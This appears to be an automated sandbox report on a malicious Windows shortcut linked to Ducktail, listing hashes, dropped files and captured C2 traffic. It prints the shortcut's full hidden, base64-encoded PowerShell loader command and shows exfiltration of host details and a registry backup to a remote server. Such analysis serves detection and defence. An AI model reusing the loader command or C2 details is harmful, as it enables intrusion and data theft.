cocomethode.de	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	message__86_4F_17774_8082F476_ccg01mail04_.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	http://balmyrind.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.187.200
ENZUINC-US	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	104.203.163.1
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	104.202.51.86
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.89.70.126
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	104.202.0.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.128.139
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\myRdpService.exe	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20010
Entropy (8bit):	5.02483968322263
Encrypted:	false
SSDEEP:	384:Prib43WKmVoGIpN6KQkj2Fkjh4iUxDhQIeFzUpX+OdBNNXp5yvOjJlYoaYpib47:PRWKmV3IpNBQkj2Uh4iUxDhiFzUpX+Oh
MD5:	435D032DDB5301D507119F054ABE9587
SHA1:	E5D4154F38575B85F59ECEBAED506F2C8EBB9F73
SHA-256:	A0309E124EAB5BCDEA5BF518D641576499DE7FEAA5662CC95F6ABD5EAF5853E9
SHA-512:	23B177CC2418E2A5677DE81CBE648CA651C7DA91E06D7847C02015FA89D2A3B321800DC5E9C6E6B028436ED54A56A36785058F73C12836DC774C24BDA3E182C1
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Dec 11 11:58:28 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.9948677037201414
Encrypted:	false
SSDEEP:	24:H2m9hSD5g4HoYwKGmNII+ycuZhNCakSqPNnqSSd:hSD644KGmu1ulCa3GqSC
MD5:	74F53528D8310918488DD76D35B68E50
SHA1:	C41C385D1F4865C7293F3C8F1FBA43F781E17663
SHA-256:	782C787233C92AD8998C858CFB7D8836EAAF4DDFC26FB4CC9B9CC3E5CC42647C
SHA-512:	D85A525E4AB67D6027E7E7445F90CEDAE43EE2462CE496A0A264DFC5DEB913DC4D17443ACE154575D6E9035D1885C4203880305125B8F8FD97FA0643EE29849C
Malicious:	false
Preview:	L...d~Yg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\oho2nqxk\CSC33DBF5592E3045FEA3FE203350D9DA4A.TMP..................A.S.Z@.7.....~............5.......C:\Users\user\AppData\Local\Temp\RES2347.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.h.o.2.n.q.x.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

Process:	C:\Windows\Temp\svczHost.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	9429504
Entropy (8bit):	6.889775220697302
Encrypted:	false
SSDEEP:	98304:mfhsbOItDNUaBVthhcT/Fe5Yqa5z1bRT6G0EYd+Tj:HbO8N9BH4ToYqopbRT6GLpj
MD5:	5641F3A5B9787F23D3D34F0D9F791B7A
SHA1:	021867C55B5724C28981F58A9A38DBE298057793
SHA-256:	5744321DFC2240023EF89A8D3A4B57C635FEDFEF0E265F1C8F7971AA9F635C34
SHA-512:	3E96E1675C96A0CEAD3E7294128CB742D7813F65AB55F907D0F447B966BCD086FB533D25D710E9F9CC5C1781D1819C2F2C86DEBBD94A6A901C9A49AB30430E7B
Malicious:	true
Joe Sandbox View:	Filename: 3y37oMIUy6.lnk, Detection: malicious, Browse Filename: m9c7iq9nzP.lnk, Detection: malicious, Browse Filename: WXahq3ZEss.lnk, Detection: malicious, Browse Filename: 0A3NB8ot11.lnk, Detection: malicious, Browse Filename: rRtGI3L0ca.lnk, Detection: malicious, Browse Filename: L0jeOoavu4.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6 ..Xs..Xs..Xs...s..Xs..Yr..Xs..Ys,.Xs..[r..Xs..\r..Xs..]r..Xs..\r..Xs..Xs..Xs..]r.Xs..Xr..Xs..Zr..XsRich..Xs................PE..d.....Xg.........."....).>P...A................@.............................@............`...................................................\|............................ ..L...............................(...P...@.............l..............................text....G.......H.................. ..`.managedX.C..`....C..L.............. ..`hydrated`....`P..........................rdata..`t9...l..v9..BP.............@..@.data....x..........................@....pdata...............>..............@..@.rsrc..............................@..@.reloc..L.... .....................@..B................................................................................................................................................................

Process:	C:\Windows\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	5492
Entropy (8bit):	3.2564408602149646
Encrypted:	false
SSDEEP:	96:0PVJqMXWMRUYSFd5YtU6W66zpVwkP9Odgd8zkFJdlzOkJdB0u1Jd8ui4c4d8zB/H:sVJqgUZ/5+g7P94RgFx9R43Zy1TbZH56
MD5:	A766DECEF71813234AAF41DB4EF5086E
SHA1:	564473B1CB74ED13E820C62F30642836B8D983C6
SHA-256:	8CA780CD4F6488CBBB1B6999D935B4F8352B36B3E2E1E54301875C6483A87535
SHA-512:	C3CF7BADAD40C63C0479DD7A50762968038A9D402E8AE34697F30D09E206D5D090270013504B801EECB82D234280535E21629A6F23F1F04CE1CF2D3EF0C37051
Malicious:	true
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.Y.S.T.E.M.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.T.e.r.m.S.e.r.v.i.c.e.].....".D.e.p.e.n.d.O.n.S.e.r.v.i.c.e.".=.h.e.x.(.7.).:.5.2.,.0.0.,.5.0.,.0.0.,.4.3.,.0.0.,.5.3.,.0.0.,.5.3.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.....".D.e.s.c.r.i.p.t.i.o.n.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.7.".....".D.i.s.p.l.a.y.N.a.m.e.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.8.".....".E.r.r.o.r.C.o.n.t.r.o.l.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.1.....".F.a.i.l.u.r.e.A.c.t.i.o.n.s.".=.h.e.x.:.8.0.,.5.1.,.0.1.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.3.,.0.0.,.0.0.,.0.0.,.1.4.,.0.0.,.0.0.,.\..... . .0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.....".I.m.a.g.e.P.a.t.h.".=.h.e.x.

File type:	MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=341, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Entropy (8bit):	9.265040403268966E-4
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	MdmRznA6gx.lnk
File size:	38'797'312 bytes
MD5:	e436af2f8e08b4ebd7335a75005c2355
SHA1:	59350c5f14c8e94dd49fa609abca2ed7c2cd8182
SHA256:	df588335b83c2dc3f5877573821d9345b2cba4b80ade65e940bc065846c9c82c
SHA512:	2b03d8fbd42d324f6bb165c76b8e431f8896ba321a783bcd80d48941d05dbd2dfca7b5966bb3130ec28d42604d2e427bb32dc70c32331e0b3b1a683e5d929da0
SSDEEP:	96:8dL8rlMvomw/mheGqIz2lE5hgcZFLWjGRx4RpflwOh:858rlMvomnBLYRfWO
TLSH:	A587E00269EB00C9F16757701FDCF8FF477AE4221A2EB6B61100D7418B35BC8CA62AB4
File Content Preview:	L..................F.B..................................U.......................^./.v. ./.k. .".p.o.w.E.R.S.h.e.L.l...E.X.E. .-.W.I.n.D.O.w.S.t.Y.l.e. .H.i.D.d.E.N. .-.e.n.c.O.d.e.D.c.O.m.m.A.n.d. .".U.w.B.0.A.G.E.A.c.g.B.0.A.C.0.A.U.A.B.y.A.G.8.A.Y.w.B.l

General
Relative Path:
Command Line Argument:	/v /k "powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Icon location:	%SystemRoot%\System32\imageres.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 12:58:28.097974062 CET	65491	53	192.168.11.30	1.1.1.1
Dec 11, 2024 12:58:28.314687967 CET	53	65491	1.1.1.1	192.168.11.30

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 12:59:15.104028940 CET	73	OUT	GET /api/check HTTP/1.1 Host: cocomethode.de Connection: Keep-Alive
Dec 11, 2024 12:59:15.809452057 CET	1289	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:59:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GryZd4RcCUPrFpeIYW%2B%2BP%2FrbLmpm4okDRZNxaBvus0UWvfCG3zv2p8b0tr5lRSpvzjWzM%2F6qqh5Q0TDD%2BJCMHs5%2BTQczxncn8aF%2FMBcLyi2rAvSRBAXne0RfS0nrRrlah0mlOKBBOzHd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=39918&min_rtt=1313&rtt_var=17630&sent=18317&recv=7815&lost=0&retrans=8&sent_bytes=26147049&recv_bytes=153368&delivery_rate=13338408&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054eb7cda7dd1c-ATL server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=311&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=49&min_rtt=49&rtt_var=24&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=298&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: Data Raw: Data Ascii:
Dec 11, 2024 12:59:15.809469938 CET	194	IN	Data Raw: 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 34 31 35 34 26 6d 69 6e 5f 72 74 74 3d 31 31 34 31 35 34 26 72 74 74 5f 76 61 72 3d 35 37 30 37 37 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d 30 Data Ascii: cfL4;desc="?proto=TCP&rtt=114154&min_rtt=114154&rtt_var=57077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=73&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 11, 2024 12:59:15.809483051 CET	362	IN	Data Raw: 31 36 33 0d 0a 31 37 33 33 39 31 38 33 35 35 7c 4c 54 7a 52 79 54 65 68 4d 2b 31 30 41 7a 30 35 63 32 73 2f 41 36 58 4d 57 6a 76 48 76 47 36 2f 7a 72 38 79 57 58 63 6e 38 72 65 57 51 4d 52 46 43 32 32 50 2b 58 4b 70 69 67 74 35 6a 43 58 46 4a 4f Data Ascii: 1631733918355\|LTzRyTehM+10Az05c2s/A6XMWjvHvG6/zr8yWXcn8reWQMRFC22P+XKpigt5jCXFJOTyg/mTGKsJmqQIE//f+VvL1iPLTyv2acwpbq1U1egaEEfUCGtj7yuzj2NIBYBf+IG+dndrGuCwlQFQ9SPUqqxMKq8YOBIMOtVI9KIKikRhA0I+15lwe2lFx2nPC65fQa1SDhzQ3zdXwuKxMRdnJb6XgKhloQ0jsFS
Dec 11, 2024 12:59:15.809495926 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 13:00:26.616353035 CET	164	OUT	GET /client/ws HTTP/1.1 Host: 23.88.71.29:8000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Key: P37CVvydV0uU0RMWimDFVA== Sec-WebSocket-Version: 13
Dec 11, 2024 13:00:27.402431965 CET	850	IN	HTTP/1.1 101 Switching Protocols Upgrade: Websocket Server: Microsoft-IIS/8.5 Sec-Websocket-Accept: FGVzSAwsekhcdDJeWY0MerZX9lA= CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWbTiH%2BcB%2F6S8%2FXpYAAMGo8NoS9xbWDzpnwE%2FSuy3W600EaWz%2BHtwHyz%2Br9Sw%2BRv6PhZ5URxk5ohoiN9NnxLRR9fyT%2FkmHTjIV%2B6BFtbFHnn7YWvLvQKtDUzsDouLK78HlAINS16vK%2B0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f05507718d18f3a-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5692&min_rtt=5692&rtt_var=2846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=307&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Connection: Upgrade Date: Wed, 11 Dec 2024 12:00:27 GMT

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 13:00:31.144151926 CET	234	OUT	POST /api/registry HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: application/json Content-Length: 102 Data Raw: 22 45 43 41 34 45 37 46 36 34 35 43 45 41 42 43 46 31 34 31 44 36 30 32 43 43 33 30 38 39 36 37 32 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "ECA4E7F645CEABCF141D602CC3089672\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Dec 11, 2024 13:00:31.895072937 CET	803	IN	HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5hwc2anfMhTBbTILtzzKGcbg4HCAVNsZWFBIg1RXWtHfi%2BGE3QlsYmSBx0PXtfqbcLt7Rlgaj9uVz4Xd4shEjPN%2BfR4PPiAyvsFlymOrH7Iym%2FTWKKmnBC6DowU9ZIGNQMKBN1DoNOYH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f0550936c14193f-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5414&min_rtt=5414&rtt_var=2707&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=380&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Wed, 11 Dec 2024 12:00:31 GMT Content-Length: 32 Data Raw: 36 63 63 65 37 31 38 32 64 35 30 65 64 33 64 37 65 36 31 31 34 36 36 63 63 65 61 66 61 35 65 32 Data Ascii: 6cce7182d50ed3d7e611466cceafa5e2

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 13:00:32.115813971 CET	4096	OUT	POST /api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2 HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---------------------8dd19b1807a0468 Content-Length: 5689 Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 62 31 38 30 37 61 30 34 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 [TRUNCATED] Data Ascii: -----------------------8dd19b1807a0468Content-Disposition: form-data; name="file"; filename="regBackup.reg"Content-Type: application/octet-streamWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00"Description"="@%SystemRoot%\\System32\\termsrv.dll,-267""DisplayName"="@%SystemRoot%\\System32\\termsrv.dll,-268""ErrorControl"=dword:00000001"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea, [TRUNCATED]
Dec 11, 2024 13:00:32.544503927 CET	841	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXJJl8blQBrpvqnYuWBGKkfbavtBQefGeUCZv0%2FP4gKNvDBGhHObw%2FPQTF3BUU5PcyLiyzFT%2F1V7ct%2FwK5gPvzGNAhJqVU%2B9sGPGshUtFjz8uuAQW7ITy0loEzrl1n2bItXCqdRxBUYu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f05509979a7193f-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5412&min_rtt=5343&rtt_var=2033&sent=8&recv=11&lost=0&retrans=0&sent_bytes=816&recv_bytes=6478&delivery_rate=540440&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Wed, 11 Dec 2024 12:00:31 GMT Content-Length: 41 Data Raw: 46 69 6c 65 20 72 65 67 42 61 63 6b 75 70 2e 72 65 67 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e Data Ascii: File regBackup.reg uploaded successfully.

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:28 UTC	161	OUT	GET /Zd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
